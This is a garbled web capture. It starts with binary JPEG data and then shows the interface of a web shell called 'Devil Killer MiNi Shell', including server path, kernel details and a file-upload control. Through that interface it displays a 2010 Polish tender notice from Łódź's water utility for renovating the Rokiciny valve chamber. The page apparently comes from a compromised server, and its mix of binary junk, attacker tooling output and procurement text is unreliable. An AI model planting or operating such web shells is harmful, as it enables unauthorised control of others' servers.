JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100726/198537-N-2010.html

<p class="kh_header"><b>Łódź: Modernizacja i remont komory zasuw zbiornika wody czystej Rokiciny</b><br>
<b>Numer ogłoszenia: 198537 - 2010; data zamieszczenia: 26.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Sp. z o.o. , ul. Wierzbowa 52, 90-133 Łódź, woj. łódzkie, tel. 042 6778202, 6781879, faks 042 6788761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja i remont komory zasuw zbiornika wody czystej Rokiciny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wielkość zamówienia - poniżej 4 845 000 euro.
2.  Przedmiotem niniejszego zamówienia jest wspólne zamówienia publiczne pn: Modernizacja i remont komory zasuw 
     zbiornika wody czystej Rokiciny 
3. Zakres rzeczowy robót świadczony na rzecz Inwestora 1 - ZWiK Sp. z o.o. :
3.1. Remont budynku komory zasuw:
3.1.1. Remont elewacji: 
        - odspojony tynk zewnętrzny skuć, a następnie uzupełnić,
        - istniejące pęknięcia i rysy wypełnić rzadką zaprawą plastyczną, 
        - zeskrobać złuszczoną farbę,
        - po naprawie tynków istniejących należy wykonać tynk cienkowarstwowy akrylowy 
          np. WEBER TERRANOWA na  podkładzie gruntującym w kolorach piaskowym i brązowym jak pokazano 
          na rys elewacji,
        - zdemontować luksfery w otworach okiennych i zamontować okna PCV otwierano - uchylne,
        - wykonać nowe parapety zewnętrzne oraz obróbkę gzymsu nad oknami z blachy stalowej powlekanej w kolorze 
          brązowym (RAL 8011),
        - istniejącą obróbkę blacharską dachu oraz rynny i rury spustowe należy po oczyszczeniu pomalować farbami do 
          ocynku (chromianowymi) w kolorze brązowym.
3.1.2. Remont ścian wewnętrznych, stropów i posadzek:
         - oczyścić ściany i sufity - powłokę malarską oraz gipsową ze ścian zeskrobać,
         - osuszyć ściany i sufity,
         - uszkodzone i spękane tynki uzupełnić rzadką zaprawą cementową,
         - usunąć zawilgocony tynk i wykonać nowy , 
         - zagruntować podłoże obrzutką np. REMMERS Spezial Vorspritzmortel,
         - uzupełnić ubytki tynkiem podkładowym np. Grundputz i tynkiem renowacyjnym Sanierputz - stara biel,
         - po wyschnięciu podłoża dwukrotnie pomalować ściany farbą paroszczelną organiczno - krzemianową 
            np. REMMERS Sanierputz farbe w kolorze białym,
-	malowanie barierek i kątowników (obrzeże otworu w stropie oraz krawędzie stopni), po  oczyszczeniu elementów do II stopnia czystości i zagruntowaniu malowanie 2x farbą olejną w kolorze do uzgodnienia z użytkownikiem,
         - naprawa podpór murowanych (słupków) rurociągów w podpiwniczeniu. Odtworzenie (uzupełnić fragmenty 
           wierzchnie) podpór poprzez nadmurowanie 3 warstw z cegły pełnej i wykończenie wierzchu zaprawą betonową 
           B-20. Pod rurociągi podłożyć podkładki z EPDM. Ścianki boczne podpór otynkować tynkiem cem-wap i
           pomalować  farbami tak jak ściany w pomieszczeniu,
 3.1.3. Roboty remontowe zewnętrzne:
        - zasklepić otwory w dachu  (4szt., O200) od zewnątrz blachą 50x50 cm gr.8 mm, od wewnątrz styropianem gr. 10 
          cm przymocowanym szpilkami stalowymi do blachy i otynkowany tynkiem na siatce,
         - nad otworami wykorzystanymi do wentylacji (3 szt.) wykonać kominki murowane lub betonowe pod podstawy 
           dachowe wentylatorów,
         - pokrycia dachu naprawić poprzez wykonanie nowego pokrycia z papy termozgrzewalnej podkładowej
            i wierzchniej w pasie 1 m na całej szerokości budynku (od strony elewacji budynku),
         - wykonanie odprowadzenia powierzchniowego wody deszczowej z rury spustowej za pomocą prefabrykowanych 
           korytek betonowych 25x20 cm l = 100 cm  x 5 szt. ułożonych na skarpie na podsypce cementowo-piaskowej 
           wg rys. detalu. Styk poszczególnych korytek uszczelnić szczeliwem wodoszczelnym (hydrostop elastyczny)

4. Zakres rzeczowy robót świadczony na rzecz Inwestora 2  - Miasto Łódź - Urząd Miasta Łodzi - Wydział 
    Gospodarki Komunalnej  :
4.2. Roboty modernizacyjne 
4.2.1. Roboty instalacyjne : 
         - demontaż starej instalacji wentylacji w tym wentylatorów  i wywietrzaków dachowych,
         - montaż urządzeń i przewodów (kanały z laminatu) wentylacji mechanicznej w tym :
           instalacja osuszania i instalacja wentylacji ogólnej,
         - zamurowanie otworów w stropie po zdemontowanej starej instalacji,
         - wykonanie podmurówek pod nowe urządzenia na dachu,
         - wykonanie konstrukcji wsporczej pod osuszacz, 
         - montaż osuszacza powietrza na konstrukcji ze stali kształtowej o wydajności osuszania 2,8 kg/h, mocy 
            całkowitej 4,3 kW, waga 50 kg  wraz z niezbędną instalacją wg projektu,
         - montaż wentylatora dachowego na podstawie stalowej: V=180 m3/h, P=90 Pa, U=3x400V, n=900obr., 
           N=0,09kW,
  4.2.2. Roboty elektryczne:
         - wykonanie i montaż rozdzielni TE-W  wraz z instalacją zasilania,
         - przebudowa wewnętrznego zasilania urządzeń wentylacyjnych,
         - wykonanie instalacji zasilania i sterowania osuszacza powietrza,
         - wykonanie instalacji uziemiającej szyn PEN,
         - wykonanie pomiarów i badań.

5.	Szczegółowy opis przedmiotu zamówienia zawiera  dokumentacja projektowa (projekt budowlano- wykonawczy )  
    oraz specyfikacja techniczna wykonania i odbioru robót 

   6.  Dodatkowe wymagania wspólne  dla zakresu robót remontowych i modernizacyjnych
    6.1. Wykonawca przed przystąpieniem do robót instalacyjnych powinien zapoznać się z dokumentacją istniejących 
          instalacji elektroenergetycznych, wodno-kanalizacyjnych i innych będących w posiadaniu Użytkownika w celu 
          uniknięcia ewentualnych kolizji przy prowadzeniu robót.
    6.2.Wykonawca najpóźniej przed przystąpieniem do realizacji prac przedstawi do akceptacji projekt organizacji 
          i harmonogram robót uwzględniając wszystkie warunki w jakich będą  wykonywane roboty. Harmonogram robót 
          musi być zaakceptowany przez Użytkownika  i Inspektora Nadzoru. 
    6.3.Montaż urządzeń należy wykonać zgodnie z instrukcją producenta oraz wymaganiami zawartymi w normach 
          dotyczących odpowiednich instalacji.
    6.4. Wykonawca przy prowadzeniu robót instalacyjnych powinien:
  - stosować się do wskazówek montażowych zawartych w projekcie,
  - modyfikować konfigurację zaprojektowanych instalacji tylko w uzgodnieniu  z projektantem i ZWiK Sp. z .o.o.
  - wszelkie odstępstwa od dokumentacji uzgadniać z projektantem i osobą pełniącą nadzór inwestorski, którzy 
     powinni dokonać odpowiednich wpisów do dziennika budowy,
          - wszelkie problemy powinny być sygnalizowane projektantowi i osobie prowadzącej nadzór inwestorski, 
            a po ich rozwiązaniu dokumentowane przez naniesienie modyfikacji w egzemplarzu dokumentacji
            powykonawczej.

    7.  Technologia robót wspólna dla zakresu robót remontowych i modernizacyjnych
    7.1. Przed przystąpieniem do robót związanych z przebudową czynnych urządzeń  Wykonawca zgłosi zamiar ich 
          wykonania Użytkownikowi obiektu i dokona aktualizacji zawartych uzgodnień. 
    7.2. Wykonawca pokryje wszystkie opłaty związane z wykonaniem robót jak np. lokalizację i identyfikację
          urządzeń instalacji, koszty wyłączenia i załączenia urządzeń, zapewnienia dozoru przez pracowników 
          Użytkownika o ile  zaistnieje taka konieczność itp. 
    7.3. Wszystkie roboty muszą być wykonywane przez wykwalifikowanych pracowników, posiadających aktualne 
           szkoleniaBHP na stanowisku pracy stosownie do rodzaju robót i kierowane przez osoby posiadające
           odpowiednie uprawnienia  wymagane przez Prawo Budowlane. 

    8.  Warunki szczegółowe realizacji robót wspólne  dla zakresu robót remontowych i modernizacyjnych:
   8.2. Całość robót remontowych i modernizacyjnych wykonać zgodnie projektem.
   8.3.  Remont pomieszczeń będzie wykonywany na czynnym obiekcie. Należy zabezpieczyć foliami ochronnymi 
           rurociągi.
   8.4. Wszystkie instalacje elektryczne lub alarmowe, które nie podlegają pracom remontowym a wchodzą w kolizję 
          z wykonywanymi pracami należy zdemontować a następnie zamontować po uprzednim uzgodnieniu i pod 
          nadzorem użytkownika.

   9.  Materiały i urządzenia 
   9.1.  Wykonawca na swój koszt i własnym staraniem dostarcza wszystkie materiały i urządzenia niezbędne 
           do wykonania  przedmiotu umowy.  
   9.2. Materiały i urządzenia powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do  obrotu i 
          stosowania  w budownictwie zgodnie z ustawą o wyrobach  budowlanych z dnia 16.04.2004r. (Dz.U.Nr 92.2004
          poz. 881 ze zm.).
   9.3. Montaż  należy zrealizować zgodnie z  wymogami aprobaty technicznej wydanej do danego rodzaju wyrobu. 
10. Zamawiający  dopuszcza  ujęcie w ofercie , a następnie zastosowanie innych technologii  i 
      materiałów niż podano w dokumentacji projektowej  pod warunkiem  zapewnienia parametrów nie  
      gorszych niż określone w tej  dokumentacji , posiadających atesty ITB i PZH
      W takiej sytuacji Zamawiający  wymaga złożenia stosownych dokumentów, uwiarygodniających te 
     technologie  i materiały . Złożone wyżej wskazane dokumenty  będą podlegały ocenie przez autora 
     dokumentacji projektowej, który sporządzi stosowną opinię. 
     Opinia ta  będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu 
     nierównoważności zaproponowanych zamienników.
11.   Szczegółowe zasady i warunki realizacji zamówienia publicznego, warunki płatności , warunki rękojmi i 
      gwarancji jakości oraz warunki odbioru robót zawarte są we wzorze umowy - zał. nr 7 do SIWZ.
12. Zamawiający  nie stawia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4 Pzp.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.52-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 124.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia o którym mowa w  rozdz. VII pkt. 1 ppkt .3 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może  się ubiegać wykonawca który wykaże  wykonanie w ciągu ostatnich pięciu lat 
przed upływem terminu składania ofert ( a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie)  co 
najmniej dwóch robót budowlano-instalacyjnych (instalacje wentylacyjne i elektryczne) o wartości  każdej z nich 
nie mniejszej niż 100 tys. zł (brutto)  
Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia o którym mowa w  rozdziale VII pkt. 1 ppkt. 3 SIWZ oraz dokumentów, o których mowa w rozdziale VII pkt.1, ppkt. 5 i 6  SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w rozdziale VII pkt. 1, ppkt. 3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może  się ubiegać wykonawca który wykaże, że przy wykonywaniu zamówienia będzie dysponował osobą/osobami  posiadającą/ymi  uprawniania  w specjalności :
a.	konstrukcyjno-budowlanej bez ograniczeń,  uprawniające do kierowania robotami budowlanymi 
      ( osoba ta pełnić  będzie funkcję kierownika budowy) ,
b.	instalacyjnej  w zakresie instalacji wentylacyjnych (dopuszcza się uprawnienia w ograniczonym zakresie ),  uprawniające do kierowania robotami budowlanymi przy wykonywaniu instalacji wentylacyjnych  (osoba ta pełnić będzie funkcję kierownika w zakresie robót instalacyjnych ),
c.	instalacyjnej w zakresie instalacji elektrycznych (dopuszcza się w uprawnienia w ograniczonym zakresie ),  uprawniające do kierowania robotami budowlanymi przy wykonywaniu instalacji elektrycznych   (osoba ta pełnić będzie funkcję kierownika w zakresie robót elektrycznych )

Uprawnienia o których  mowa w powyżej  powinny być zgodne z ustawą z dnia 7 lipca 1994r, Prawo  budowlane (Dz. U. z 2006r. Nr 156, poz. 1118, ze zm.) oraz Rozporządzeniem Ministra  Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r. Nr 83, poz. 578 ze zm.).

Dopuszcza się uprawnienia równoważnie - dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z 
dnia 7 lipca 1994r. Prawo budowlane   uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do 
pełnienia samodzielnych funkcji technicznych w budownictwie, i zachowała uprawnienia do pełnienia tych funkcji w 
dotychczasowym zakresie.

W przypadku wykonawców zagranicznych,  dopuszcza się równoważne kwalifikacje, zdobyte w innych 
państwach, na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem 
postanowień ustawy z dnia 18 marca 2008r. (Dz. U. z 2008r. Nr 63 poz. 394 ze zm.) o zasadach uznawania 
kwalifikacji zawodowych nabytych w państwach  członkowskich Unii Europejskiej.
Ocena spełnienia tego warunku dokonana będzie na podstawie złożonych przez Wykonawcę oświadczeń, o których mowa w rozdziale VII  pkt. 1 ppkt. 3 i 4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w rozdziale VII pkt. 3 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Należy złożyć dokumenty o którym mowa w sekcji  II.1.3  pkt. 10 ogłoszenia (rozdz. III pkt. 10 SIWZ) .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień umowy w przypadkach i  na zasadach  określonych w paragrafie 15 wzoru umowy stanowiącego załącznik nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać pod adresem :ZWiK Sp. z o.o. 90-133 Łódź, ul.Wierzbowa 52, pok.A-213 lub otrzymać pocztą na wniosek wykonawcy  za zaliczeniem pocztowym.Cena SIWZ wynosi  52,00PLN+koszt przesyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 10:30, miejsce: Zakład Wodociągów i Kanalizacji Sp. z o.o. 90-133 Łódź, ul. Wierzbowa 52, budynek A, pokój nr 132 (kancelaria), która pracuje w dni robocze od poniedziałku do piątku w godz. 8-16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.16.1.) Informacje o formalnościach, które winny być dopełnione przez Wykonawcę po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego

1.	W celu zawarcia umowy wykonawca przed podpisaniem umowy winien  dostarczyć zamawiającemu  :
1.1. Uprawnienia  osób  o których mowa w rozdz. VI pkt.1. ppkt. 4 SIWZ. 
       Do wskazanych wyżej uprawnień, Wykonawca winien załączyć aktualne zaświadczenie o wpisie na listę 
       właściwej izby samorządu zawodowego (nie dotyczy osoby o której  mowa w rozdz. VI pkt. 6 SIWZ)
1.2. Opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
       odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej wystawiony  na kwotę co najmniej 
       100 000,00 zł . Wykonawca zapewnia ważność ubezpieczenia na okres trwania umowy o udzielenie niniejszego 
       zamówienia  publicznego.
1.3.	W przypadku wykonawców będących osobami fizycznymi  - aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub 
        dokument ten wystawiony z datą wcześniejszą, ale potwierdzony przez organ wydający w wymaganym terminie.
1.4.	W przypadku wykonawców występujących wspólnie -  umowę   regulującą  współpracę tych Wykonawców . Umowa ta  winna zawierać co najmniej:
wyszczególnienie Wykonawców wspólnie ubiegających się o udzielenia zamówienia (podmioty składające wspólną ofertę),
określenie celu gospodarczego, dla którego umowa została zawarta (celem tym musi być zrealizowanie przedmiotowego zamówienia ),
wskazanie pełnomocnika do ich reprezentowania i zawarcia umowy, 
 zapis mówiący, że Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za realizację umowy, za niewykonanie lub nienależyte wykonanie umowy oraz odpowiedzialność z tytułu udzielonej rękojmi za wady i gwarancji jakości ,
okres obowiązywania umowy  winien być nie krótszy niż  okres realizacji umowy oraz okres udzielonej rękojmi za wady i gwarancji jakości,
 wskazanie podmiotu na rzecz, którego kierowane będą wszystkie płatności oraz korespondencja,
 zasady rozliczeń pomiędzy Wykonawcami działającymi wspólnie,
zapis mówiący, że żaden z podmiotów występujących wspólnie nie może scedować swoich praw i obowiązków wynikających z zawartej umowy na osoby trzecie bez zgody Inwestora 1 i Inwestora 2 
2.	Wybrany wykonawca  jako wytwórca odpadów  przed  podpisaniem umowy, zobowiązany będzie przedłożyć 
      zamawiającemu  stosowne (odpowiednie ) dokumenty określone w art. 17 ust. 1 pkt. 1 ,2  ustawy z dnia  
      27 kwietnia 2001r. o odpadach  ( Dz. U. nr 62 z 2001r  poz. 628 z późniejszymi  zmianami) tj. :
w przypadku wytwarzania odpadów niebezpiecznych w ilości powyżej 0,1 Mg rocznie- decyzję 
             zatwierdzającą program gospodarki odpadami niebezpiecznymi,
w przypadku wytwarzania odpadów niebezpiecznych w ilości do 0,1 Mg rocznie albo powyżej 5 Mg 
